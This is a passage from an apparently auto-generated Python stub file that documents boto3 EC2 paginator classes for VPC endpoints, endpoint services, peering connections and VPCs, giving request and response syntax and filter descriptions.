Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_connection_notifications`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointConnectionNotifications>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
ConnectionNotificationId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ConnectionNotificationSet': [
{
'ConnectionNotificationId': 'string',
'ServiceId': 'string',
'VpcEndpointId': 'string',
'ConnectionNotificationType': 'Topic',
'ConnectionNotificationArn': 'string',
'ConnectionEvents': [
'string',
],
'ConnectionNotificationState': 'Enabled'|'Disabled'
},
],
}
**Response Structure**
- *(dict) --*
- **ConnectionNotificationSet** *(list) --*
One or more notifications.
- *(dict) --*
Describes a connection notification for a VPC endpoint or VPC endpoint service.
- **ConnectionNotificationId** *(string) --*
The ID of the notification.
- **ServiceId** *(string) --*
The ID of the endpoint service.
- **VpcEndpointId** *(string) --*
The ID of the VPC endpoint.
- **ConnectionNotificationType** *(string) --*
The type of notification.
- **ConnectionNotificationArn** *(string) --*
The ARN of the SNS topic for the notification.
- **ConnectionEvents** *(list) --*
The events for the notification. Valid values are ``Accept`` , ``Connect`` , ``Delete`` , and ``Reject`` .
- *(string) --*
- **ConnectionNotificationState** *(string) --*
The state of the notification.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type ConnectionNotificationId: string
:param ConnectionNotificationId:
The ID of the notification.
:type Filters: list
:param Filters:
One or more filters.
* ``connection-notification-arn`` - The ARN of SNS topic for the notification.
* ``connection-notification-id`` - The ID of the notification.
* ``connection-notification-state`` - The state of the notification (``Enabled`` | ``Disabled`` ).
* ``connection-notification-type`` - The type of notification (``Topic`` ).
* ``service-id`` - The ID of the endpoint service.
* ``vpc-endpoint-id`` - The ID of the VPC endpoint.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpointConnections(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_connections`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointConnections>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'VpcEndpointConnections': [
{
'ServiceId': 'string',
'VpcEndpointId': 'string',
'VpcEndpointOwner': 'string',
'VpcEndpointState': 'PendingAcceptance'|'Pending'|'Available'|'Deleting'|'Deleted'|'Rejected'|'Failed'|'Expired',
'CreationTimestamp': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
- **VpcEndpointConnections** *(list) --*
Information about one or more VPC endpoint connections.
- *(dict) --*
Describes a VPC endpoint connection to a service.
- **ServiceId** *(string) --*
The ID of the service to which the endpoint is connected.
- **VpcEndpointId** *(string) --*
The ID of the VPC endpoint.
- **VpcEndpointOwner** *(string) --*
The AWS account ID of the owner of the VPC endpoint.
- **VpcEndpointState** *(string) --*
The state of the VPC endpoint.
- **CreationTimestamp** *(datetime) --*
The date and time the VPC endpoint was created.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
One or more filters.
* ``service-id`` - The ID of the service.
* ``vpc-endpoint-owner`` - The AWS account number of the owner of the endpoint.
* ``vpc-endpoint-state`` - The state of the endpoint (``pendingAcceptance`` | ``pending`` | ``available`` | ``deleting`` | ``deleted`` | ``rejected`` | ``failed`` ).
* ``vpc-endpoint-id`` - The ID of the endpoint.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpointServiceConfigurations(Paginator):
def paginate(self, DryRun: bool = None, ServiceIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_service_configurations`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServiceConfigurations>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
ServiceIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ServiceConfigurations': [
{
'ServiceType': [
{
'ServiceType': 'Interface'|'Gateway'
},
],
'ServiceId': 'string',
'ServiceName': 'string',
'ServiceState': 'Pending'|'Available'|'Deleting'|'Deleted'|'Failed',
'AvailabilityZones': [
'string',
],
'AcceptanceRequired': True|False,
'ManagesVpcEndpoints': True|False,
'NetworkLoadBalancerArns': [
'string',
],
'BaseEndpointDnsNames': [
'string',
],
'PrivateDnsName': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **ServiceConfigurations** *(list) --*
Information about one or more services.
- *(dict) --*
Describes a service configuration for a VPC endpoint service.
- **ServiceType** *(list) --*
The type of service.
- *(dict) --*
Describes the type of service for a VPC endpoint.
- **ServiceType** *(string) --*
The type of service.
- **ServiceId** *(string) --*
The ID of the service.
- **ServiceName** *(string) --*
The name of the service.
- **ServiceState** *(string) --*
The service state.
- **AvailabilityZones** *(list) --*
In the Availability Zones in which the service is available.
- *(string) --*
- **AcceptanceRequired** *(boolean) --*
Indicates whether requests from other AWS accounts to create an endpoint to the service must first be accepted.
- **ManagesVpcEndpoints** *(boolean) --*
Indicates whether the service manages it's VPC endpoints. Management of the service VPC endpoints using the VPC endpoint API is restricted.
- **NetworkLoadBalancerArns** *(list) --*
The Amazon Resource Names (ARNs) of the Network Load Balancers for the service.
- *(string) --*
- **BaseEndpointDnsNames** *(list) --*
The DNS names for the service.
- *(string) --*
- **PrivateDnsName** *(string) --*
The private DNS name for the service.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type ServiceIds: list
:param ServiceIds:
The IDs of one or more services.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
* ``service-name`` - The name of the service.
* ``service-id`` - The ID of the service.
* ``service-state`` - The state of the service (``Pending`` | ``Available`` | ``Deleting`` | ``Deleted`` | ``Failed`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpointServicePermissions(Paginator):
def paginate(self, ServiceId: str, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_service_permissions`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServicePermissions>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
ServiceId='string',
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'AllowedPrincipals': [
{
'PrincipalType': 'All'|'Service'|'OrganizationUnit'|'Account'|'User'|'Role',
'Principal': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **AllowedPrincipals** *(list) --*
Information about one or more allowed principals.
- *(dict) --*
Describes a principal.
- **PrincipalType** *(string) --*
The type of principal.
- **Principal** *(string) --*
The Amazon Resource Name (ARN) of the principal.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type ServiceId: string
:param ServiceId: **[REQUIRED]**
The ID of the service.
:type Filters: list
:param Filters:
One or more filters.
* ``principal`` - The ARN of the principal.
* ``principal-type`` - The principal type (``All`` | ``Service`` | ``OrganizationUnit`` | ``Account`` | ``User`` | ``Role`` ).
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpointServices(Paginator):
def paginate(self, DryRun: bool = None, ServiceNames: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoint_services`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpointServices>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
ServiceNames=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'ServiceNames': [
'string',
],
'ServiceDetails': [
{
'ServiceName': 'string',
'ServiceType': [
{
'ServiceType': 'Interface'|'Gateway'
},
],
'AvailabilityZones': [
'string',
],
'Owner': 'string',
'BaseEndpointDnsNames': [
'string',
],
'PrivateDnsName': 'string',
'VpcEndpointPolicySupported': True|False,
'AcceptanceRequired': True|False,
'ManagesVpcEndpoints': True|False
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeVpcEndpointServices.
- **ServiceNames** *(list) --*
A list of supported services.
- *(string) --*
- **ServiceDetails** *(list) --*
Information about the service.
- *(dict) --*
Describes a VPC endpoint service.
- **ServiceName** *(string) --*
The Amazon Resource Name (ARN) of the service.
- **ServiceType** *(list) --*
The type of service.
- *(dict) --*
Describes the type of service for a VPC endpoint.
- **ServiceType** *(string) --*
The type of service.
- **AvailabilityZones** *(list) --*
The Availability Zones in which the service is available.
- *(string) --*
- **Owner** *(string) --*
The AWS account ID of the service owner.
- **BaseEndpointDnsNames** *(list) --*
The DNS names for the service.
- *(string) --*
- **PrivateDnsName** *(string) --*
The private DNS name for the service.
- **VpcEndpointPolicySupported** *(boolean) --*
Indicates whether the service supports endpoint policies.
- **AcceptanceRequired** *(boolean) --*
Indicates whether VPC endpoint connection requests to the service must be accepted by the service owner.
- **ManagesVpcEndpoints** *(boolean) --*
Indicates whether the service manages it's VPC endpoints. Management of the service VPC endpoints using the VPC endpoint API is restricted.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type ServiceNames: list
:param ServiceNames:
One or more service names.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
* ``service-name`` : The name of the service.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcEndpoints(Paginator):
def paginate(self, DryRun: bool = None, VpcEndpointIds: List = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_endpoints`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcEndpoints>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
VpcEndpointIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'VpcEndpoints': [
{
'VpcEndpointId': 'string',
'VpcEndpointType': 'Interface'|'Gateway',
'VpcId': 'string',
'ServiceName': 'string',
'State': 'PendingAcceptance'|'Pending'|'Available'|'Deleting'|'Deleted'|'Rejected'|'Failed'|'Expired',
'PolicyDocument': 'string',
'RouteTableIds': [
'string',
],
'SubnetIds': [
'string',
],
'Groups': [
{
'GroupId': 'string',
'GroupName': 'string'
},
],
'PrivateDnsEnabled': True|False,
'RequesterManaged': True|False,
'NetworkInterfaceIds': [
'string',
],
'DnsEntries': [
{
'DnsName': 'string',
'HostedZoneId': 'string'
},
],
'CreationTimestamp': datetime(2015, 1, 1)
},
],
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeVpcEndpoints.
- **VpcEndpoints** *(list) --*
Information about the endpoints.
- *(dict) --*
Describes a VPC endpoint.
- **VpcEndpointId** *(string) --*
The ID of the VPC endpoint.
- **VpcEndpointType** *(string) --*
The type of endpoint.
- **VpcId** *(string) --*
The ID of the VPC to which the endpoint is associated.
- **ServiceName** *(string) --*
The name of the service to which the endpoint is associated.
- **State** *(string) --*
The state of the VPC endpoint.
- **PolicyDocument** *(string) --*
The policy document associated with the endpoint, if applicable.
- **RouteTableIds** *(list) --*
(Gateway endpoint) One or more route tables associated with the endpoint.
- *(string) --*
- **SubnetIds** *(list) --*
(Interface endpoint) One or more subnets in which the endpoint is located.
- *(string) --*
- **Groups** *(list) --*
(Interface endpoint) Information about the security groups associated with the network interface.
- *(dict) --*
Describes a security group.
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group.
- **PrivateDnsEnabled** *(boolean) --*
(Interface endpoint) Indicates whether the VPC is associated with a private hosted zone.
- **RequesterManaged** *(boolean) --*
Indicates whether the VPC endpoint is being managed by its service.
- **NetworkInterfaceIds** *(list) --*
(Interface endpoint) One or more network interfaces for the endpoint.
- *(string) --*
- **DnsEntries** *(list) --*
(Interface endpoint) The DNS entries for the endpoint.
- *(dict) --*
Describes a DNS entry.
- **DnsName** *(string) --*
The DNS name.
- **HostedZoneId** *(string) --*
The ID of the private hosted zone.
- **CreationTimestamp** *(datetime) --*
The date and time the VPC endpoint was created.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type VpcEndpointIds: list
:param VpcEndpointIds:
One or more endpoint IDs.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters.
* ``service-name`` : The name of the service.
* ``vpc-id`` : The ID of the VPC in which the endpoint resides.
* ``vpc-endpoint-id`` : The ID of the endpoint.
* ``vpc-endpoint-state`` : The state of the endpoint. (``pending`` | ``available`` | ``deleting`` | ``deleted`` )
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcPeeringConnections(Paginator):
def paginate(self, Filters: List = None, DryRun: bool = None, VpcPeeringConnectionIds: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpc_peering_connections`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcPeeringConnections>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
VpcPeeringConnectionIds=[
'string',
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'VpcPeeringConnections': [
{
'AccepterVpcInfo': {
'CidrBlock': 'string',
'Ipv6CidrBlockSet': [
{
'Ipv6CidrBlock': 'string'
},
],
'CidrBlockSet': [
{
'CidrBlock': 'string'
},
],
'OwnerId': 'string',
'PeeringOptions': {
'AllowDnsResolutionFromRemoteVpc': True|False,
'AllowEgressFromLocalClassicLinkToRemoteVpc': True|False,
'AllowEgressFromLocalVpcToRemoteClassicLink': True|False
},
'VpcId': 'string',
'Region': 'string'
},
'ExpirationTime': datetime(2015, 1, 1),
'RequesterVpcInfo': {
'CidrBlock': 'string',
'Ipv6CidrBlockSet': [
{
'Ipv6CidrBlock': 'string'
},
],
'CidrBlockSet': [
{
'CidrBlock': 'string'
},
],
'OwnerId': 'string',
'PeeringOptions': {
'AllowDnsResolutionFromRemoteVpc': True|False,
'AllowEgressFromLocalClassicLinkToRemoteVpc': True|False,
'AllowEgressFromLocalVpcToRemoteClassicLink': True|False
},
'VpcId': 'string',
'Region': 'string'
},
'Status': {
'Code': 'initiating-request'|'pending-acceptance'|'active'|'deleted'|'rejected'|'failed'|'expired'|'provisioning'|'deleting',
'Message': 'string'
},
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
],
'VpcPeeringConnectionId': 'string'
},
],
}
**Response Structure**
- *(dict) --*
- **VpcPeeringConnections** *(list) --*
Information about the VPC peering connections.
- *(dict) --*
Describes a VPC peering connection.
- **AccepterVpcInfo** *(dict) --*
Information about the accepter VPC. CIDR block information is only returned when describing an active VPC peering connection.
- **CidrBlock** *(string) --*
The IPv4 CIDR block for the VPC.
- **Ipv6CidrBlockSet** *(list) --*
The IPv6 CIDR block for the VPC.
- *(dict) --*
Describes an IPv6 CIDR block.
- **Ipv6CidrBlock** *(string) --*
The IPv6 CIDR block.
- **CidrBlockSet** *(list) --*
Information about the IPv4 CIDR blocks for the VPC.
- *(dict) --*
Describes an IPv4 CIDR block.
- **CidrBlock** *(string) --*
The IPv4 CIDR block.
- **OwnerId** *(string) --*
The AWS account ID of the VPC owner.
- **PeeringOptions** *(dict) --*
Information about the VPC peering connection options for the accepter or requester VPC.
- **AllowDnsResolutionFromRemoteVpc** *(boolean) --*
Indicates whether a local VPC can resolve public DNS hostnames to private IP addresses when queried from instances in a peer VPC.
- **AllowEgressFromLocalClassicLinkToRemoteVpc** *(boolean) --*
Indicates whether a local ClassicLink connection can communicate with the peer VPC over the VPC peering connection.
- **AllowEgressFromLocalVpcToRemoteClassicLink** *(boolean) --*
Indicates whether a local VPC can communicate with a ClassicLink connection in the peer VPC over the VPC peering connection.
- **VpcId** *(string) --*
The ID of the VPC.
- **Region** *(string) --*
The region in which the VPC is located.
- **ExpirationTime** *(datetime) --*
The time that an unaccepted VPC peering connection will expire.
- **RequesterVpcInfo** *(dict) --*
Information about the requester VPC. CIDR block information is only returned when describing an active VPC peering connection.
- **CidrBlock** *(string) --*
The IPv4 CIDR block for the VPC.
- **Ipv6CidrBlockSet** *(list) --*
The IPv6 CIDR block for the VPC.
- *(dict) --*
Describes an IPv6 CIDR block.
- **Ipv6CidrBlock** *(string) --*
The IPv6 CIDR block.
- **CidrBlockSet** *(list) --*
Information about the IPv4 CIDR blocks for the VPC.
- *(dict) --*
Describes an IPv4 CIDR block.
- **CidrBlock** *(string) --*
The IPv4 CIDR block.
- **OwnerId** *(string) --*
The AWS account ID of the VPC owner.
- **PeeringOptions** *(dict) --*
Information about the VPC peering connection options for the accepter or requester VPC.
- **AllowDnsResolutionFromRemoteVpc** *(boolean) --*
Indicates whether a local VPC can resolve public DNS hostnames to private IP addresses when queried from instances in a peer VPC.
- **AllowEgressFromLocalClassicLinkToRemoteVpc** *(boolean) --*
Indicates whether a local ClassicLink connection can communicate with the peer VPC over the VPC peering connection.
- **AllowEgressFromLocalVpcToRemoteClassicLink** *(boolean) --*
Indicates whether a local VPC can communicate with a ClassicLink connection in the peer VPC over the VPC peering connection.
- **VpcId** *(string) --*
The ID of the VPC.
- **Region** *(string) --*
The region in which the VPC is located.
- **Status** *(dict) --*
The status of the VPC peering connection.
- **Code** *(string) --*
The status of the VPC peering connection.
- **Message** *(string) --*
A message that provides more information about the status, if applicable.
- **Tags** *(list) --*
Any tags assigned to the resource.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
- **VpcPeeringConnectionId** *(string) --*
The ID of the VPC peering connection.
:type Filters: list
:param Filters:
One or more filters.
* ``accepter-vpc-info.cidr-block`` - The IPv4 CIDR block of the accepter VPC.
* ``accepter-vpc-info.owner-id`` - The AWS account ID of the owner of the accepter VPC.
* ``accepter-vpc-info.vpc-id`` - The ID of the accepter VPC.
* ``expiration-time`` - The expiration date and time for the VPC peering connection.
* ``requester-vpc-info.cidr-block`` - The IPv4 CIDR block of the requester\'s VPC.
* ``requester-vpc-info.owner-id`` - The AWS account ID of the owner of the requester VPC.
* ``requester-vpc-info.vpc-id`` - The ID of the requester VPC.
* ``status-code`` - The status of the VPC peering connection (``pending-acceptance`` | ``failed`` | ``expired`` | ``provisioning`` | ``active`` | ``deleting`` | ``deleted`` | ``rejected`` ).
* ``status-message`` - A message that provides more information about the status of the VPC peering connection, if applicable.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``vpc-peering-connection-id`` - The ID of the VPC peering connection.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type VpcPeeringConnectionIds: list
:param VpcPeeringConnectionIds:
One or more VPC peering connection IDs.
Default: Describes all your VPC peering connections.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeVpcs(Paginator):
def paginate(self, Filters: List = None, VpcIds: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_vpcs`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeVpcs>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
VpcIds=[
'string',
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Vpcs': [
{
'CidrBlock': 'string',
'DhcpOptionsId': 'string',
'State': 'pending'|'available',
'VpcId': 'string',
'OwnerId': 'string',
'InstanceTenancy': 'default'|'dedicated'|'host',
'Ipv6CidrBlockAssociationSet': [
{
'AssociationId': 'string',
'Ipv6CidrBlock': 'string',
'Ipv6CidrBlockState': {
'State': 'associating'|'associated'|'disassociating'|'disassociated'|'failing'|'failed',
'StatusMessage': 'string'
}
},
],
'CidrBlockAssociationSet': [
{
'AssociationId': 'string',
'CidrBlock': 'string',
'CidrBlockState': {
'State': 'associating'|'associated'|'disassociating'|'disassociated'|'failing'|'failed',
'StatusMessage': 'string'
}
},
],
'IsDefault': True|False,
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **Vpcs** *(list) --*
Information about one or more VPCs.
- *(dict) --*
Describes a VPC.
- **CidrBlock** *(string) --*
The primary IPv4 CIDR block for the VPC.
- **DhcpOptionsId** *(string) --*
The ID of the set of DHCP options you've associated with the VPC (or ``default`` if the default options are associated with the VPC).
- **State** *(string) --*
The current state of the VPC.
- **VpcId** *(string) --*
The ID of the VPC.
- **OwnerId** *(string) --*
The ID of the AWS account that owns the VPC.
- **InstanceTenancy** *(string) --*
The allowed tenancy of instances launched into the VPC.
- **Ipv6CidrBlockAssociationSet** *(list) --*
Information about the IPv6 CIDR blocks associated with the VPC.
- *(dict) --*
Describes an IPv6 CIDR block associated with a VPC.
- **AssociationId** *(string) --*
The association ID for the IPv6 CIDR block.
